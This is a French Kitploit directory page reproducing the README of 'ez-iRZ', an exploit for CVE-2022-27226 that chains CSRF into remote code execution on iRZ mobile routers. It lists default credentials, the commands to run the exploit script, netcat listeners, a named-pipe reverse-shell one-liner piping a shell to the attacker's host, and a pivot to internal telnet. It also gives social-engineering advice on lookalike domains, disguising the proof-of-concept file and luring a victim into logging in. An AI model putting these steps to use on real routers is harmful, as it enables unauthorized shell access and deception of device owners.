Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ez-iRZ — Exploit pour CVE-2022-27226 | Kitploit
Outils/GitHubGitHub/sakurasamuraii/ez-irz
ExploitationExploitation d'Applications WebTests d'IntrusionIngénierie SocialeOutil d'Accès à Distance
GitHubsakurasamuraii/ez-irz

ez-iRZ

Exploit pour CVE-2022-27226

Voir le dépôt
1563il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ez-iRZ

Exploit pour CVE-2022-27226

Cross Site Request Forgery vers l'exécution de code à distance dans les routeurs mobiles iRZ

Crédits

<--Découverte de vulnérabilité-->

John Jackson

Chris Mack --- [https://github.com/0xHalcyon]

<--Développement de l'exploit-->

Stephen Chavez --- [https://github.com/redragonx/]

Robert Willis

Description

Un problème de CSRF sur les routeurs mobiles iRZ jusqu'au 16 mars 2022 permet à un acteur malveillant de créer une entrée crontab dans le panneau d'administration du routeur. Le cronjob exécutera ensuite l'entrée à l'intervalle défini par l'acteur, conduisant à une exécution de code à distance, permettant à l'acteur d'obtenir un accès au système de fichiers. De plus, si les identifiants par défaut du routeur n'ont pas été modifiés ou si un acteur découvre des identifiants valides, l'exécution de code à distance peut être réalisée sans interaction de l'utilisateur.

Notes avant exécution :

Il est pertinent de démarrer deux écouteurs netcat avant de tenter de capturer un shell, car le crontab, lorsqu'il est exécuté, répétera la même tâche cron plusieurs fois et votre shell mourra au cycle suivant. Vous ne pouvez pas utiliser nohup car l'environnement busybox est assez restrictif, et alternativement vous pourriez modifier l'exploit avec un intervalle d'entrée crontab différent, cependant la meilleure façon de contourner cela sans se soucier de l'intervalle du crontab est d'utiliser plusieurs écouteurs pour la première capture de reverse shell.

Il a été découvert que dans la plupart des cas, les routeurs n'ont pas le port telnet ouvert en externe - cependant, une fois l'exécution de code à distance obtenue, vous pouvez utiliser telnet pour corriger le TTY pour la plupart. Vous devez avoir des identifiants pour le faire. Si vous utilisez la chaîne complète CSRF vers RCE, nous vous recommandons de construire un modèle de PoC CSRF plus complet qui enregistre l'événement de connexion de l'utilisateur ou les en-têtes qui peuvent contenir l'en-tête d'autorisation de base qui est traduit dans le script.

Exécution du module d'exécution de code à distance post-authentifié (avec identifiants)

Les identifiants par défaut pour ces routeurs sont généralement root:root ou admin:admin. Si vous avez des identifiants, exécutez :

root@kitploit:~
python cve.py

Suivez les instructions qui sont assez simples, puis démarrez deux écouteurs netcat sur deux ports séparés.

root@kitploit:~
nc -lvp 443
nc -lvp 5000

Lorsque vous capturez un reverse shell dans le premier écouteur, réexécutez la commande one-liner de reverse shell pour obtenir un shell persistant :

root@kitploit:~
rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} {second_nc_listener_port} >/tmp/f

Enfin, si vous avez des identifiants (ce qui devrait être le cas si vous utilisez cette partie du module) - essayez de pivoter vers le service telnet restreint en interne :

root@kitploit:~
telnet 0.0.0.0

Mais que faire si telnet est exposé en externe ? Alors connectez-vous au foutu routeur avec les identifiants, abruti.

Exécution du module CSRF vers RCE (sans identifiants)

Les instructions pour ce module sont presque les mêmes que celles du RCE post-authentifié. La grande différence étant que vous n'avez pas d'identifiants.

Tout d'abord, pour exploiter efficacement, vous devez comprendre comment cela fonctionne. CSRF nécessite une interaction de l'utilisateur, ce qui signifie que vous devrez faire de l'ingénierie sociale. Il y a deux scénarios potentiels : l'utilisateur est connecté lorsqu'il clique sur le bouton de preuve de concept, ou l'utilisateur n'est pas connecté. S'il est déjà authentifié sur le routeur, la requête POST pour créer la tâche cron sera envoyée à l'API et l'utilisateur verra une page blanche. S'il n'est pas connecté, l'utilisateur recevra une invite d'authentification de base - et assez commodément, la popup d'authentification de base aura l'IP du routeur victime, s'il entre ses identifiants, cela envoie la requête POST à l'API.

Nous recommandons d'essayer d'acheter un domaine similaire si le routeur victime est hébergé sur un sous-domaine ou de trouver un fournisseur avec les mêmes plages de sous-réseaux pour les serveurs s'il s'agit d'une cible prioritaire. Affiner le PoC CSRF peut en valoir la peine pour une cible prioritaire.

Exécutez le script

root@kitploit:~
python cve.py

Suivez les instructions, dans le script, il générera ensuite un modèle csrf pour vous. Nous recommandons de le nommer quelque chose d'un peu plus discret.

root@kitploit:~
mv poc.new.html index.html

Hébergez le PoC sur votre serveur, de préférence sur le même port que le routeur victime.

root@kitploit:~
python3 -m http.server 80

Prenez le lien et envoyez-le à la victime, en veillant à ajouter le nom du fichier PoC à la fin de l'URL :

root@kitploit:~
Salut chérie, peux-tu te connecter au routeur s'il te plaît :
http://your-ip-in-the-united-states-bcuz-you-didnt-take-my-advice/index.html
Télécharger l’outil